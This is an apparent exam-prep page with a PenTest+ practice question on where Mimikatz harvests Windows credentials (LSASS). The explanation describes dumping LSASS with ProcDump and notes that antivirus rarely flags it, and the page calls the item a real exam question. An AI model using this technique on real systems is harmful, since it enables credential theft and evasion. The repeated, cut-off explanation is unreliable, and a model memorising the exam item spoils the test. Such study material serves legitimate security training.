PT0-001 Question #147: Real Exam Question with Answer & Explanation

The correct answer is A: LSASS. Attackers can pull credentials from LSASS (Local Security Authority Subsystem Service) using a variety of techniques: Dump the LSASS process from memory to disk using Sysinternals ProcDump. Since ProcDump is a signed Microsoft utility, AV usually doesn't trigger on it. ProcDump c

Post-exploitation and lateral movement

Question

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

Options

ALSASS
BSAM database
CActive Directory
DRegistry

Explanation

Attackers can pull credentials from LSASS (Local Security Authority Subsystem Service) using a variety of techniques: Dump the LSASS process from memory to disk using Sysinternals ProcDump. Since ProcDump is a signed Microsoft utility, AV usually doesn't trigger on it. ProcDump creates a minidump of the target process from which Mimikatz can extract Dump the LSASS process from memory to disk using Sysinternals ProcDump. Since ProcDump is a signed Microsoft utility, AV usually doesn’t trigger on it. ProcDump creates a minidump of the target process from which Mimikatzcan extract credentials.

Topics

#Mimikatz#LSASS#credential harvesting#privilege escalation

Community Discussion

No community discussion yet for this question.

Full PT0-001 Practice